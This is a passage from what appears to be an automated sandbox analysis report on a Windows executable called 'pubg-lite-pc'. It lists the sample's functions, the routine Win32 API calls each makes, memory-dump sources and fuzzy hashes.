                                                                                                • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00995910
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00995918
                                                                                                  • Part of subcall function 0092F630: SetWindowLongW.USER32(?,000000FC,00000000), ref: 0092F666
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$AddressCreateLongProc
                                                                                                • String ID: SysListView32
                                                                                                • API String ID: 5470851-78025650
                                                                                                • Opcode ID: b5631db3f79f62b0d96cf9c9d36d16a4e7d95d3d224256c0bccc116842aea1a9
                                                                                                • Instruction ID: 97f44654978af898ffaad4f6fba5b8217f95e201b87b33d488c3f6e7f9913bdf
                                                                                                • Opcode Fuzzy Hash: b5631db3f79f62b0d96cf9c9d36d16a4e7d95d3d224256c0bccc116842aea1a9
                                                                                                • Instruction Fuzzy Hash: 1C113935340314BFD6259F55CC09F6BFBAAFBC9B50F054619FA04AB2A1C7B1A900CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00930F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00B0380C), ref: 00930FBC
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00930FD0
                                                                                                • LeaveCriticalSection.KERNEL32(00B0380C), ref: 0093100E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                • String ID: @,w
                                                                                                • API String ID: 2351996187-1809401727
                                                                                                • Opcode ID: 39aa29daedbafed12539ae300a772ed5ef5a4fb58890d70e084e0875b9f990b5
                                                                                                • Instruction ID: 8d53e2bd37d7886703e90c6a6bf37142a676cf1df7e7db66146186cc755cae98
                                                                                                • Opcode Fuzzy Hash: 39aa29daedbafed12539ae300a772ed5ef5a4fb58890d70e084e0875b9f990b5
                                                                                                • Instruction Fuzzy Hash: 4E11E731A44354DBCB20CF59C90476AFFF8FB58B10F1486AEE816973A0DB719904CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009941A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(?,COMBOBOX,?,00000000,?,80000000,00000000,00000000,00000000,00000000,00000000), ref: 009941EB
                                                                                                • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00994203
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 0099420B
                                                                                                  • Part of subcall function 0092F630: SetWindowLongW.USER32(?,000000FC,00000000), ref: 0092F666
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$CreateLong
                                                                                                • String ID: COMBOBOX
                                                                                                • API String ID: 4015368215-1136563877
                                                                                                • Opcode ID: 3a7e57cb9c3ebe976f162fefde981c1e6d4347d27b5fc5bab1c320e324e36410
                                                                                                • Instruction ID: b39a7cedb9896bbb0a112026238e84f29ff47b77c54ae417af9994c93c4c506c
                                                                                                • Opcode Fuzzy Hash: 3a7e57cb9c3ebe976f162fefde981c1e6d4347d27b5fc5bab1c320e324e36410
                                                                                                • Instruction Fuzzy Hash: 19016935300314BFD6159F15CC08F6BFBAAFBC9B50F15821AFA04A72A0C6B1AC00CAA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00994340 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(?,EDIT,?,00000000,?,80000000,00000000,00000000,00000000,00000000,00000000), ref: 0099438B
                                                                                                • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 009943A3
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 009943AB
                                                                                                  • Part of subcall function 0092F630: SetWindowLongW.USER32(?,000000FC,00000000), ref: 0092F666
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$CreateLong
                                                                                                • String ID: EDIT
                                                                                                • API String ID: 4015368215-3080729518
                                                                                                • Opcode ID: ac765be43ce5560473abfcc5196bdbf7258563f4204d8041d54ad156dd1af09d
                                                                                                • Instruction ID: 39471332bdd48703d6ef6107d01518644703cd5c73f7350b3c85ca2d369ee7f2
                                                                                                • Opcode Fuzzy Hash: ac765be43ce5560473abfcc5196bdbf7258563f4204d8041d54ad156dd1af09d
                                                                                                • Instruction Fuzzy Hash: B1016935300314BFD6159F15CC08F6BFBAAFBC9B50F15821AFA04A72A0C6B1AC00CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00996990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(46030080,RichEdit20W,?,00000000,46030080,80000000,00000000,00000000,00000000,00000000,00000000), ref: 009969DB
                                                                                                • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 009969F3
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 009969FB
                                                                                                  • Part of subcall function 0092F630: SetWindowLongW.USER32(?,000000FC,00000000), ref: 0092F666
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$CreateLong
                                                                                                • String ID: RichEdit20W
                                                                                                • API String ID: 4015368215-4173859555
                                                                                                • Opcode ID: 418efb703659f27aa7579cb281d828ceb4350aa2bf6973e3d8572533f19ae07f
                                                                                                • Instruction ID: ed3e9338a77c528e3b29ae666d9b685a0c06439ef552f9fd37726d943867b298
                                                                                                • Opcode Fuzzy Hash: 418efb703659f27aa7579cb281d828ceb4350aa2bf6973e3d8572533f19ae07f
                                                                                                • Instruction Fuzzy Hash: B8016935341314BFD6259F15CC08F6BFBAAFBC9B50F158219FA04A72A0C6B1AC00CAA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00993DB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(?,BUTTON,?,00000000,?,80000000,00000000,00000000,00000000,00000000,00000000), ref: 00993DFB
                                                                                                • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00993E13
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00993E1B
                                                                                                  • Part of subcall function 0092F630: SetWindowLongW.USER32(?,000000FC,00000000), ref: 0092F666
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$CreateLong
                                                                                                • String ID: BUTTON
                                                                                                • API String ID: 4015368215-3405671355
                                                                                                • Opcode ID: 9f4fe9320d7416f7832447c1ecc11d8f2f422d3302e64f95937885ddbaca48f7
                                                                                                • Instruction ID: f1f10fe7a4c224cf7253ed59e8d5a4e6d17088e6e46b9939a0b8429b0f202c47
                                                                                                • Opcode Fuzzy Hash: 9f4fe9320d7416f7832447c1ecc11d8f2f422d3302e64f95937885ddbaca48f7
                                                                                                • Instruction Fuzzy Hash: 92016935300314BFD6159F15CC08F6BFBAAFBC9B50F15821AFA04A72A0C6B1AC00CAA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00957080 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetParent.USER32(?), ref: 009570D1
                                                                                                • GetParent.USER32(?), ref: 009570DA
                                                                                                • SendMessageW.USER32(?,00000411,00000000,?), ref: 009570EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Parent$MessageSend
                                                                                                • String ID: ,
                                                                                                • API String ID: 2251359880-3772416878
                                                                                                • Opcode ID: 753720404be4e7532e0c2ecc5d06408e9c35196779431b5d7b7c4384e8d751f1
                                                                                                • Instruction ID: a0aabcefb08e6f22b19fa964088210aecb4b17efee6d42f6dd4d478734865446
                                                                                                • Opcode Fuzzy Hash: 753720404be4e7532e0c2ecc5d06408e9c35196779431b5d7b7c4384e8d751f1
                                                                                                • Instruction Fuzzy Hash: 5C115E719087009FD711DF65DD48B1BFBE9BB88311F00492AE954836A0D771E918CF92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0093DB40 Relevance: 6.3, APIs: 4, Instructions: 291windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0093DC88
                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 0093DC9D
                                                                                                  • Part of subcall function 00928FC0: RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                  • Part of subcall function 00995990: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,0093DCD8,00000000,80004005), ref: 009959FB
                                                                                                  • Part of subcall function 00995990: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00995A2B
                                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 0093DDCE
                                                                                                • SendMessageW.USER32(?,00001061,00000000,00000005), ref: 0093DEC3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$AllocateHeapWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3168177373-0
                                                                                                • Opcode ID: ec2fc9d717a84cb67f3ed004d70fb2b03a11b4ded21737e495d3c2a34de71af5
                                                                                                • Instruction ID: ee15cfdda6af847945c81874592fcf9d17c4fe8575fc5f1b53e37b4173a29c86
                                                                                                • Opcode Fuzzy Hash: ec2fc9d717a84cb67f3ed004d70fb2b03a11b4ded21737e495d3c2a34de71af5
                                                                                                • Instruction Fuzzy Hash: 6BB1AE71A01209EFDB14DFA8D894BEEFBB5FF48314F144219E425AB290DB74A944CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0092D820 Relevance: 6.3, APIs: 4, Instructions: 271memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SysAllocStringLen.OLEAUT32(00000000,?), ref: 0092D8EA
                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0092D936
                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0092D958
                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0092DAB3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: String$Free$Alloc
                                                                                                • String ID:
                                                                                                • API String ID: 986138563-0
                                                                                                • Opcode ID: dcaaad6b9cb1adee0c7197e32c0ad309f8c5b0164f133ee9c1bbd030611481db
                                                                                                • Instruction ID: b7e6a1d59e02fe1bd8885f3190c09440b8e60dbae63c2c6667f32cbfce63281c
                                                                                                • Opcode Fuzzy Hash: dcaaad6b9cb1adee0c7197e32c0ad309f8c5b0164f133ee9c1bbd030611481db
                                                                                                • Instruction Fuzzy Hash: 05A1BC75A02219EFDB14DFA8DC48FAEB7B8EF44310F108619F515E7284DB74AA01CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00979A20 Relevance: 6.3, APIs: 4, Instructions: 263windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00979C3B
                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00979C5E
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00979CD6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 2165194322-0
                                                                                                • Opcode ID: b68a2d90b0fb523d31e90881d532449ceb997c6f301fa8e5c1f383138989e444
                                                                                                • Instruction ID: 6b4708d87f973dc68d11590ae2a84b6e2214cf8d80e68f2b678e2c5991692f0d
                                                                                                • Opcode Fuzzy Hash: b68a2d90b0fb523d31e90881d532449ceb997c6f301fa8e5c1f383138989e444
                                                                                                • Instruction Fuzzy Hash: 97A1A031A01248DFCB05DFA8C989BDEBBF5FF59314F144169E819AB391DB30AA05CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CC570 Relevance: 6.1, APIs: 4, Instructions: 149fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DeleteFileW.KERNEL32(?,F4D3B90A), ref: 009CC63F
                                                                                                • GetLastError.KERNEL32 ref: 009CC647
                                                                                                • RemoveDirectoryW.KERNEL32(?,F4D3B90A), ref: 009CC6A5
                                                                                                • GetLastError.KERNEL32 ref: 009CC6AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$DeleteDirectoryFileRemove
                                                                                                • String ID:
                                                                                                • API String ID: 50330452-0
                                                                                                • Opcode ID: f0aafae5addaa7077f6200efd09f8029447ec0708d5e33439b404438d98015d6
                                                                                                • Instruction ID: 776b1f544dca75d61bd00c3805be672867fb195729da135535d736183223f6b3
                                                                                                • Opcode Fuzzy Hash: f0aafae5addaa7077f6200efd09f8029447ec0708d5e33439b404438d98015d6
                                                                                                • Instruction Fuzzy Hash: E1518EB1E0060AAFDB14DFA4C698FEEFBB4FB06314F00021DE41997251DB35A909CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0093A960 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InitializeCriticalSection.KERNEL32(F4D3B90A,F4D3B90A,?), ref: 0093A99F
                                                                                                • EnterCriticalSection.KERNEL32(?,F4D3B90A,?), ref: 0093A9AC
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?), ref: 0093AA83
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterInitializeLeave
                                                                                                • String ID: @,w
                                                                                                • API String ID: 3991485460-1809401727
                                                                                                • Opcode ID: b223217884102a8517e1b3b2e081ac0971d8d4e73f36bbe1786e997c8374eb2b
                                                                                                • Instruction ID: fcb1b5ba0e46890f18c9189b5839e89a320eaffa3a223f60bac1ccd386df6a4e
                                                                                                • Opcode Fuzzy Hash: b223217884102a8517e1b3b2e081ac0971d8d4e73f36bbe1786e997c8374eb2b
                                                                                                • Instruction Fuzzy Hash: AA41EF352007468FCB21CF68C944BAABBB6EF45310F104929E8D6D7392CB31AC16DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CB820 Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,?,?,00000000,00000000), ref: 009CB87F
                                                                                                • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 009CB88C
                                                                                                • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 009CB8A9
                                                                                                • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 009CB8CB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1717984340-0
                                                                                                • Opcode ID: bb9aa7c1a7e3296fc5e03f6dcd7f7cbf238eff79bc41f81ecf19cf61b0a0404f
                                                                                                • Instruction ID: f11ab88ca682cf77affaf2310993914b3f8d2fa20f41a88be2ead4dd4163b25a
                                                                                                • Opcode Fuzzy Hash: bb9aa7c1a7e3296fc5e03f6dcd7f7cbf238eff79bc41f81ecf19cf61b0a0404f
                                                                                                • Instruction Fuzzy Hash: A72125B5B4030A7BE7109F54EC93F66775CEF94744F20012DFA01972C0EBA17D068AA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00986A80 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32 ref: 00986ADD
                                                                                                • SendMessageW.USER32(?,0000110A,00000004,?), ref: 00986B20
                                                                                                  • Part of subcall function 00986A80: SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00986B40
                                                                                                  • Part of subcall function 00986A80: SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00986B68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
